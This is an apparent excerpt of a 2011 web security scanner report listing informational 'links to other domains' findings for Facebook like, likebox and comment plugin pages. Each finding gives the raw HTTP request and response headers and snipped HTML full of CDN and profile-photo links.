Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.124.129
X-Cnection: close
Date: Mon, 09 May 2011 14:01:17 GMT
Content-Length: 102275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/D97gxsfJDCQ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/qdjc8Os7vL6.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/Z6PtFE_aVAz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/kKOeJEnwuz7.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4wOZW9c83Yr.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<a class="viewerProfileHref" onclick="return false;" target="_blank" href="#"><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /></a>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/RmIID-GA1c2.png" style="top: -1px;" width="16" height="16" />Yahoo</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png" style="top: -1px;" width="16" height="16" />AOL</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png" style="top: -1px;" width="16" height="16" />Hotmail</span>
...[SNIP]...
</div><img class="throbber img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /><div class="postToProfile hidden_elem">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=645172076" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211513_645172076_2713688_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://www.nme.com/news/sufjan-stevens/56527?fb_comment_id=fbc_10150196646559441_16603935_10150196684414441" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;282ea&quot;, event, bagof(null));" rel="nofollow"><abbr title="Sunday, 08 May 2011 at 04:53" data-date="Sun, 08 May 2011 04:53:47 -0700">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/RmIID-GA1c2.png" style="top: -1px;" width="16" height="16" />Yahoo</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png" style="top: -1px;" width="16" height="16" />AOL</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png" style="top: -1px;" width="16" height="16" />Hotmail</span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211657_1048765383_8301852_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://www.nme.com/news/sufjan-stevens/56527?fb_comment_id=fbc_10150196646559441_16607287_10150196862769441" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;282ea&quot;, event, bagof(null));" rel="nofollow"><abbr title="Sunday, 08 May 2011 at 09:02" data-date="Sun, 08 May 2011 09:02:22 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/RmIID-GA1c2.png" style="top: -1px;" width="16" height="16" />Yahoo</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png" style="top: -1px;" width="16" height="16" />AOL</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png" style="top: -1px;" width="16" height="16" />Hotmail</span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/173502_737416661_8112487_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://www.nme.com/news/sufjan-stevens/56527?fb_comment_id=fbc_10150196646559441_16603284_10150196649149441" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;282ea&quot;, event, bagof(null));" rel="nofollow"><abbr title="Sunday, 08 May 2011 at 03:39" data-date="Sun, 08 May 2011 03:39:37 -0700">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/say.astra" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187093_701305855_6979760_q.jpg" /></a>
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/RmIID-GA1c2.png" style="top: -1px;" width="16" height="16" />Yahoo</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png" style="top: -1px;" width="16" height="16" />AOL</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png" style="top: -1px;" width="16" height="16" />Hotmail</span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/garethlfc" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211611_587822251_51947_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://www.nme.com/news/sufjan-stevens/56527?fb_comment_id=fbc_10150196646559441_16621487_10150197538854441" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;282ea&quot;, event, bagof(null));" rel="nofollow"><abbr title="Monday, 09 May 2011 at 02:48" data-date="Mon, 09 May 2011 02:48:04 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/RmIID-GA1c2.png" style="top: -1px;" width="16" height="16" />Yahoo</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png" style="top: -1px;" width="16" height="16" />AOL</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png" style="top: -1px;" width="16" height="16" />Hotmail</span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/tigerbloodpromotions" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186530_722933461_7910700_q.jpg" /></a>
...[SNIP]...
<span class="fsm fwn fcg"> .. <img class="star img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/akOVLqNGOB0.png" width="15" height="14" /> Top commenter .. <a class="uiLinkSubtle" href="http://www.facebook.com/pages/Leeds/107709815923527" target="_blank">
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://www.nme.com/news/sufjan-stevens/56527?fb_comment_id=fbc_10150196646559441_16608834_10150196939404441" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;282ea&quot;, event, bagof(null));" rel="nofollow"><abbr title="Sunday, 08 May 2011 at 10:41" data-date="Sun, 08 May 2011 10:41:25 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/RmIID-GA1c2.png" style="top: -1px;" width="16" height="16" />Yahoo</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png" style="top: -1px;" width="16" height="16" />AOL</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png" style="top: -1px;" width="16" height="16" />Hotmail</span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/harryquigley" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174398_1206258077_375414_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://www.nme.com/news/sufjan-stevens/56527?fb_comment_id=fbc_10150196646559441_16603298_10150196649749441" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;282ea&quot;, event, bagof(null));" rel="nofollow"><abbr title="Sunday, 08 May 2011 at 03:41" data-date="Sun, 08 May 2011 03:41:03 -0700">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/RmIID-GA1c2.png" style="top: -1px;" width="16" height="16" />Yahoo</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png" style="top: -1px;" width="16" height="16" />AOL</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png" style="top: -1px;" width="16" height="16" />Hotmail</span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://www.nme.com/news/sufjan-stevens/56527?fb_comment_id=fbc_10150196646559441_16603447_10150196657509441" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;282ea&quot;, event, bagof(null));" rel="nofollow"><abbr title="Sunday, 08 May 2011 at 03:58" data-date="Sun, 08 May 2011 03:58:34 -0700">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/RmIID-GA1c2.png" style="top: -1px;" width="16" height="16" />Yahoo</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png" style="top: -1px;" width="16" height="16" />AOL</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png" style="top: -1px;" width="16" height="16" />Hotmail</span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202893_827230590_1037785_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://www.nme.com/news/sufjan-stevens/56527?fb_comment_id=fbc_10150196646559441_16607783_10150196889979441" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;282ea&quot;, event, bagof(null));" rel="nofollow"><abbr title="Sunday, 08 May 2011 at 09:38" data-date="Sun, 08 May 2011 09:38:22 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/RmIID-GA1c2.png" style="top: -1px;" width="16" height="16" />Yahoo</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png" style="top: -1px;" width="16" height="16" />AOL</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png" style="top: -1px;" width="16" height="16" />Hotmail</span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/kishanthecripsterb" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187150_786775023_7546009_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://www.nme.com/news/sufjan-stevens/56527?fb_comment_id=fbc_10150196646559441_16604129_10150196694994441" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;282ea&quot;, event, bagof(null));" rel="nofollow"><abbr title="Sunday, 08 May 2011 at 05:14" data-date="Sun, 08 May 2011 05:14:53 -0700">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/RmIID-GA1c2.png" style="top: -1px;" width="16" height="16" />Yahoo</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png" style="top: -1px;" width="16" height="16" />AOL</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png" style="top: -1px;" width="16" height="16" />Hotmail</span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187730_100000480701200_6185505_q.jpg" /></a>
...[SNIP]...
<span class="fsm fwn fcg"> .. <img class="star img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/akOVLqNGOB0.png" width="15" height="14" /> Top commenter .. <a class="uiLinkSubtle" href="http://www.facebook.com/pages/Taichung-Taiwan/110922325599480" target="_blank">
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://www.nme.com/news/sufjan-stevens/56527?fb_comment_id=fbc_10150196646559441_16603269_10150196648594441" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), &quot;282ea&quot;, event, bagof(null));" rel="nofollow"><abbr title="Sunday, 08 May 2011 at 03:38" data-date="Sun, 08 May 2011 03:38:11 -0700">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/RmIID-GA1c2.png" style="top: -1px;" width="16" height="16" />Yahoo</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VangFCcwoLx.png" style="top: -1px;" width="16" height="16" />AOL</span>
...[SNIP]...
<span style="padding-left: 21px;" class="uiIconLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Q0crEbz3ZUz.png" style="top: -1px;" width="16" height="16" />Hotmail</span>
...[SNIP]...
<span class="uiMorePagerLoader pam uiBoxLightblue fbFeedbackPagerLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...
15.37. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?href=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story&layout=button_count&show_faces=true&width=135&action=recommend&font&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.120.130
X-Cnection: close
Date: Mon, 09 May 2011 13:59:33 GMT
Content-Length: 7014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
15.38. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Firishtimestheticket&width=300&colorscheme=light&connections=10&stream=false&header=false&height=270 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.80.104
X-Cnection: close
Date: Mon, 09 May 2011 14:04:05 GMT
Content-Length: 12967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/irishtimestheticket" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195710_161783523837208_5711127_q.jpg" alt="The Ticket" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186056_100000820600910_109272_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=579882707" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49935_579882707_7608281_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001501952058" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/y9/r/IB7NOFmPw2a.gif" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/23164_704176579_7818_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/48980_609631595_8142_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1026990194" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49056_1026990194_1318_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186923_549675944_4140389_q.jpg" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195419_590219482_2622940_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=650790498" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49887_650790498_7812758_q.jpg" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000756077185" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/23070_100000756077185_6442_q.jpg" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...
15.39. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?api_key=158577044196953&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df251994bac%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=258&href=http%3A%2F%2Fwww.facebook.com%2Fnmemagazine&locale=en_GB&sdk=joey&show_faces=true&stream=false&width=356 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.106.125
X-Cnection: close
Date: Mon, 09 May 2011 14:04:49 GMT
Content-Length: 18197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
